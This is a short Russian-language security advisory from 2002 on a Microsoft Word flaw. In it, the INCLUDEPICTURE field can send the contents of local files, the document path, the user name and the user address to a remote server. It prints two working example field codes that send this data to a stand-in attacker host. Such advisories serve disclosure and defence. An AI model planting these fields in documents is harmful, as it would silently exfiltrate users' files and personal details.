Доступ к произвольным файлам на системе пользователя Microsoft Word

Дата публикации:
23.09.2002
Всего просмотров:
658
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Поле INCLUDEPICTURE используется для внедрения URL в документ. Если INCLUDEPICTURE включен в документ и ссылается на URL, то атакующий может получить содержание файлов на системе пользователя. Пример:
{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { FILENAME \p } 
& { INCLUDETEXT "c:\\a.txt" } } \d } 
{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { USERNAME } 
& { USERADDRESS } } \d }
уязвимость обнаружена в Microsoft Word 2000, 2002, 95, 97

Ссылки: More vulnerabilities (Re: Security side-effects of Word fields)
или введите имя

CAPTCHA